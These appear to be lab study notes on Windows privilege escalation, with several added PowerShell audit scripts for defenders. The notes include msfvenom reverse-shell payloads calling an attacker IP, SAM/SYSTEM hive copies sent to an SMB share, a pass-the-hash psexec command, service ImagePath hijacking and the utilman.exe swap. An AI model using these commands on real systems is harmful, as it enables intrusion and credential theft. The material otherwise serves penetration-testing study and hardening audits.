Windows Privilege Escalation
Harvesting Passwords
Leftover
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services. Such installations require an administrator account to perform the initial setup, and that account's credentials might end up stored on the machine in the following locations:
type C:\Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml
History
Whenever a user runs a command in PowerShell, it is recorded in a history file that keeps a record of past commands.
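The following audit script is an added example and not part of the original notes. It walks the five leftover-file locations listed above and each user's PSReadLine history file, and reports where credential-looking content is still present so that it can be removed after deployment. It only prints the line number and the matched keyword, never the secret itself; the file paths and the keyword patterns are the example's own assumptions.

```powershell
# Added example, not part of the original notes: audit the leftover-credential
# locations from the "Leftover" section and the PSReadLine command history.

# Files that Windows Deployment Services / sysprep may leave behind.
$unattendPaths = @(
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep.inf',
    'C:\Windows\system32\sysprep\sysprep.xml'
)

# Elements and keys that carry credentials in unattend.xml and sysprep.inf (assumed list).
$unattendPattern = '(?i)<Password>|<PlainText>|AdminPassword|DefaultPassword|AutoLogon'

# Command fragments in a shell history that usually mean a secret was typed inline (assumed list).
$historyPattern = '(?i)-Password|ConvertTo-SecureString|runas|net user|cmdkey|-Credential'

foreach ($path in $unattendPaths) {
    if (-not (Test-Path -LiteralPath $path)) { continue }
    $hits = @(Select-String -LiteralPath $path -Pattern $unattendPattern)
    if ($hits.Count -gt 0) {
        Write-Warning "$path still exists and contains $($hits.Count) credential-looking line(s):"
        # Report the location and keyword only; do not echo the value.
        $hits | ForEach-Object { "  line $($_.LineNumber): matched '$($_.Matches[0].Value)'" }
    } else {
        Write-Output "$path exists but holds no credential-looking entries (still a cleanup candidate)."
    }
}

# PSReadLine writes every interactive command to ConsoleHost_history.txt per user.
$historyFiles = Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue
foreach ($file in $historyFiles) {
    $hits = @(Select-String -LiteralPath $file.FullName -Pattern $historyPattern)
    if ($hits.Count -gt 0) {
        Write-Warning "$($file.FullName): $($hits.Count) line(s) look like inline credentials; review and clear the file."
        $hits | ForEach-Object { "  line $($_.LineNumber): matched '$($_.Matches[0].Value)'" }
    }
}
```

Run it from an elevated PowerShell session, since other users' profile directories are not readable otherwise. A hit on an unattend file means the file should be deleted (or the password element stripped) and the deployment account's password rotated; a hit in a history file means the same for whatever was typed there.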
Saved Credentials
Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:
While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
IIS Configuration
Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Here is a quick way to find database connection strings in the file:
Credentials From PuTTY
PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials. To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:
Scheduled Tasks
Overwrite task file
List scheduled tasks
Show task details
Check file permission
Overwrite file
Run task
Registry
AutoRuns
Query the registry for AutoRun executables
OR you can use Autoruns64.exe
Using accesschk.exe, note that one of the AutoRun executables is writable by everyone
Copy the reverse.exe executable you created and overwrite the AutoRun executable with it
Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges.
AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them. However, they can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.
Query registry values
- To be able to exploit this vulnerability, both should be set to 1 (0x1).
- Otherwise, exploitation will not be possible.
Generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.12.153 LPORT=LOCAL_PORT -f msi -o malicious.msi
Passwords
The registry can be searched for keys and values that contain the word "password":
$user='Administrator'
$pass='Welcome1!'
$securePass = ConvertTo-SecureString $pass -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $user, $securePass
Start-Process ./shell-4445-x86.exe -Credential $credential
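The script below is an added example and not part of the original notes. It audits the registry locations that the PuTTY, AlwaysInstallElevated and Passwords sections refer to: it reports whether AlwaysInstallElevated is set in both hives, whether Winlogon auto-logon or a PuTTY session stores a cleartext password, and which value names under HKCU:\Software contain the word "password". Only locations are printed, never the stored values; the Winlogon key is an addition of this example, the other key paths are the standard ones for those features.

```powershell
# Added example, not part of the original notes: audit registry locations that
# commonly leak credentials or enable installer-based escalation.

function Get-RegValueSafe {
    # Returns the value, or $null when the key or value does not exist.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -LiteralPath $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

# 1. AlwaysInstallElevated: both the machine and the user value must be 1 for
#    MSI packages to install as SYSTEM; anything else is the safe state.
$installerKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)
$enabledCount = @($installerKeys |
    ForEach-Object { Get-RegValueSafe -Path $_ -Name 'AlwaysInstallElevated' } |
    Where-Object { $_ -eq 1 }).Count
if ($enabledCount -eq 2) {
    Write-Warning 'AlwaysInstallElevated is 1 in both HKLM and HKCU: any user can install an MSI as SYSTEM.'
    Write-Output 'Fix: disable "Always install with elevated privileges" under Windows Installer in both Computer and User Configuration (sets both values to 0).'
} else {
    Write-Output "AlwaysInstallElevated is enabled in $enabledCount of 2 hives; not exploitable as configured."
}

# 2. Winlogon auto-logon stores the account password as a cleartext DefaultPassword value.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
if (Get-RegValueSafe -Path $winlogon -Name 'DefaultPassword') {
    Write-Warning "Winlogon DefaultPassword is set (AutoAdminLogon); the password is readable from $winlogon."
}

# 3. PuTTY sessions keep proxy credentials in cleartext under the session key.
$puttySessions = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
if (Test-Path -LiteralPath $puttySessions) {
    foreach ($session in Get-ChildItem -LiteralPath $puttySessions) {
        if (Get-RegValueSafe -Path $session.PSPath -Name 'ProxyPassword') {
            Write-Warning "PuTTY session '$($session.PSChildName)' stores a cleartext ProxyPassword."
        }
    }
}

# 4. Generic sweep: value *names* containing "password" under the user's Software
#    hive. HKCU is small enough to walk; widen to HKLM only when you can afford it.
Get-ChildItem -Path 'HKCU:\Software' -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    $key = $_
    foreach ($valueName in $key.GetValueNames()) {
        if ($valueName -match '(?i)password') {
            "$($key.Name) -> '$valueName' ($($key.GetValueKind($valueName)))"
        }
    }
}
```

The sweep in step 4 deliberately matches on value names rather than contents so it stays fast and does not print secrets; a name such as ProxyPassword or DefaultPassword is enough to know what to clean up.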
Service
Overwrite executable file
Vulnerability: Insecure Service Executables. If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker trivially gains the privileges of the service's account.
Query the service configuration [windows-cmd]
Check the permissions on the executable [windows-ps]
Let's generate an exe-service payload using msfvenom and serve it through a python webserver [linux]
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
cd C:\PROGRA~2\SYSTEM~1\
cd 'C:\Program Files (x86)\SystemScheduler'
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-shell.exe WService.exe
icacls WService.exe /grant Everyone:F
Add an executable file higher up in the path hierarchy
Vulnerability: Unquoted Service Paths
List services and path [windows-ps]
Search for any unusual path, or a path where you have write access
Check the service configuration [windows-cmd]
Example path
Check path
- C:\MyPrograms\Disk Sorter Enterprise\bin\
- C:\MyPrograms\Disk Sorter Enterprise\
- C:\MyPrograms\
Windows will search for, in this order:
- C:\MyPrograms\Disk.exe
- C:\MyPrograms\Disk Sorter.exe
- C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
Check permission [windows-cmd]
icacls "c:\MyPrograms\Disk Sorter Enterprise\bin"
icacls "c:\MyPrograms\Disk Sorter Enterprise"
icacls "c:\MyPrograms"
Modified service configuration
Vulnerability: Insecure Permissions on Service Configuration
list all services [windows-ps]
check service configuration
check permissions of service [windows-ps]
- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
- Open command prompt and type
- check for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS permission
Create exploit [linux]
Start server [linux]
Setup listener [linux]
We can then pull the payload from Powershell with the following command [windows-ps]
Grant access [windows-ps]
Update service configuration [windows-cmd]
Stop and start [windows-cmd]
Modified service registry configuration
Vulnerability: Weak Registry Permissions
Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users).
To check that configuration you can also use
Overwrite the ImagePath registry key to point to the reverse.exe executable you created
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
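The audit script below is an added example and not code from the original notes. It covers the four service weaknesses described in this section in one pass: a service binary writable by low-privileged principals, an unquoted service path whose search-path directories are writable (computed the same way the "Windows will search for" list above does it), a writable service registry key, and, because the check is identical, the all-users Startup folder from the Startup Applications section. The list of low-privileged principals and the write-right bitmask are the example's own assumptions; run it from an elevated PowerShell session.

```powershell
# Added example, not part of the original notes: find services whose binary,
# unquoted search path or registry key can be changed by low-privileged users.

# Principals that should never hold write rights on these objects (assumed list).
$lowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Test-WritableByLowPriv {
    # $true when an Allow ACE gives a low-privileged principal a right that lets it
    # change the object: WriteData/SetValue (0x2), AppendData/CreateSubKey (0x4),
    # Delete (0x10000), WriteDAC (0x40000), WriteOwner (0x80000), or the generic
    # WRITE/ALL bits that Get-Acl reports as raw integers.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $writeBits = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000
    $genericWriteOrAll = 0x40000000 -bor 0x10000000
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # File ACEs expose FileSystemRights, registry ACEs RegistryRights; the bits above are shared.
        $rights = if ($ace.PSObject.Properties['FileSystemRights']) { [int]$ace.FileSystemRights } else { [int]$ace.RegistryRights }
        if ((($rights -band $writeBits) -ne 0) -or (($rights -band $genericWriteOrAll) -ne 0)) { return $true }
    }
    return $false
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $cmd = $svc.PathName
    if (-not $cmd) { continue }
    # Recover the executable: the quoted part if the path is quoted, otherwise
    # everything up to the first ".exe" (the token Windows has to guess at).
    if ($cmd -match '^"([^"]+)"') { $exe = $Matches[1]; $quoted = $true }
    elseif ($cmd -match '^(.+?\.exe)') { $exe = $Matches[1]; $quoted = $false }
    else { continue }

    if (Test-WritableByLowPriv -Path $exe) {
        [pscustomobject]@{ Service = $svc.Name; Issue = 'Service binary writable'; Object = $exe }
    }

    if (-not $quoted -and $exe.Contains(' ')) {
        # Every space yields a candidate Windows tries first, e.g. C:\MyPrograms\Disk.exe
        # and C:\MyPrograms\Disk Sorter.exe; the directory that would hold that
        # candidate is what must not be writable.
        $checked = @{}
        $pos = $exe.IndexOf(' ')
        while ($pos -ge 0) {
            $dir = Split-Path -Path $exe.Substring(0, $pos)
            if ($dir -and -not $checked.ContainsKey($dir)) {
                $checked[$dir] = $true
                if (Test-WritableByLowPriv -Path $dir) {
                    [pscustomobject]@{ Service = $svc.Name; Issue = 'Unquoted path, writable search directory'; Object = $dir }
                }
            }
            $pos = $exe.IndexOf(' ', $pos + 1)
        }
    }

    $regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
    if (Test-WritableByLowPriv -Path $regKey) {
        [pscustomobject]@{ Service = $svc.Name; Issue = 'Service registry key writable'; Object = $regKey }
    }
}

# Same check for the all-users Startup folder: anything dropped there runs at every logon.
$startup = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'
if (Test-WritableByLowPriv -Path $startup) {
    $findings += [pscustomobject]@{ Service = '(startup folder)'; Issue = 'Startup folder writable'; Object = $startup }
}

if ($findings) { $findings | Format-Table -AutoSize } else { Write-Output 'No writable service objects found for the audited principals.' }
```

Remediation for each finding is the inverse of the steps in this section: quote the path with sc.exe config <service> binPath= "\"C:\full path\bin.exe\"", and remove the offending ACE with icacls <object> /remove:g <principal> (or the registry equivalent in regedit's Permissions dialog). The `$findings +=` on a scalar result is fine in PowerShell because `+=` on a single object promotes it to an array.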
Windows Privileges
Info
Privileges are rights that an account has to perform specific system-related tasks. These tasks range from something as simple as the privilege to shut down the machine up to privileges that bypass some DACL-based access controls.
Each user has a set of assigned privileges that can be checked with the following command:
From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on https://github.com/gtworek/Priv2Admin
SeImpersonatePrivilege
PrintSpoofer is an exploit that can be used to escalate service-user permissions on Windows Server 2016, Server 2019, and Windows 10. To escalate privileges, the service account must hold the SeImpersonate privilege.
SeBackup / SeRestore
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.
Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.
On Windows, back up the SAM and SYSTEM hives (which hold the password hashes)
On Windows, send the files to the SMB server on Kali
copy C:\Users\THMBackup\sam.hive \\10.18.9.175\public\
copy C:\Users\THMBackup\system.hive \\10.18.9.175\public\
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
admin:1001:<LM>:<NTLM>:::
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 administrator@10.10.233.61
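The script below is an added example and not part of the original notes. It reports which accounts hold the privileges this page discusses (SeImpersonatePrivilege, SeBackupPrivilege, SeRestorePrivilege and SeTakeOwnershipPrivilege) by exporting the user-rights assignments with secedit and comparing them against a baseline of the default holders. The baseline table is the example's assumption of Windows client defaults and should be adjusted to the host's own policy; the secedit export file name is also an assumption.

```powershell
# Added example, not part of the original notes: flag accounts that hold the
# privileges discussed in the "Windows Privileges" section beyond the expected
# default holders. Run from an elevated PowerShell session on the audited host.

# Assumed default holders on a Windows client. IIS application pools and service
# accounts usually gain SeImpersonatePrivilege when those roles are installed,
# which is exactly the case the PrintSpoofer note above refers to.
$baseline = @{
    'SeImpersonatePrivilege'   = @('BUILTIN\Administrators', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE', 'NT AUTHORITY\SERVICE')
    'SeBackupPrivilege'        = @('BUILTIN\Administrators', 'BUILTIN\Backup Operators')
    'SeRestorePrivilege'       = @('BUILTIN\Administrators', 'BUILTIN\Backup Operators')
    'SeTakeOwnershipPrivilege' = @('BUILTIN\Administrators')
}

function Resolve-PrincipalName {
    # secedit writes principals as *SID; translate to DOMAIN\Name where possible.
    param([string]$Token)
    if ($Token -notmatch '^\*S-1-') { return $Token }
    try {
        $sid = New-Object System.Security.Principal.SecurityIdentifier -ArgumentList $Token.TrimStart('*')
        $sid.Translate([System.Security.Principal.NTAccount]).Value
    } catch { $Token }
}

function Get-PrivilegeAssignments {
    # Returns a hashtable: privilege name -> array of resolved principal names.
    $cfg = Join-Path $env:TEMP 'user-rights-export.inf'   # assumed scratch file name
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $assignments = @{}
    foreach ($line in Get-Content -LiteralPath $cfg) {
        if ($line -match '^(Se\w+Privilege)\s*=\s*(.*)$') {
            $name = $Matches[1]
            $members = $Matches[2]
            $assignments[$name] = @($members -split ',' | ForEach-Object { Resolve-PrincipalName $_.Trim() })
        }
    }
    Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    return $assignments
}

$assignments = Get-PrivilegeAssignments
foreach ($priv in $baseline.Keys) {
    $holders = if ($assignments.ContainsKey($priv)) { $assignments[$priv] } else { @() }
    $unexpected = @($holders | Where-Object { $baseline[$priv] -notcontains $_ })
    if ($unexpected.Count -gt 0) {
        Write-Warning "$priv is granted beyond the baseline to: $($unexpected -join ', ')"
    } else {
        Write-Output "$priv holders: $($holders -join ', ')"
    }
}
```

This complements the per-token view you get from whoami /priv: that command shows what the current account already has, while the export shows every account the policy grants a privilege to, including groups such as Backup Operators whose members can copy the SAM and SYSTEM hives exactly as shown above. A warning line is the cue to remove the assignment under User Rights Assignment in the local or domain security policy.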
SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys. This opens up many possibilities for an attacker to elevate privileges: we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.
cmd as administrator
Take ownership of the file
Give your user full permissions
Replace utilman.exe with a copy of cmd.exe
Trigger utilman:
- lock screen from the start button
- click on the "Ease of Access" button
Startup Applications
Add new startup application
- Open command prompt and type
- From the output, notice that the BUILTIN\Users group has full access (F) to the directory
- exploitation
- setup listener
- generate reverse shell as exe file rshell.exe
- copy rshell.exe into 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'
- Logoff & Login
Vulnerable software
- dump the information it can gather on installed software
- check the software against Exploit-DB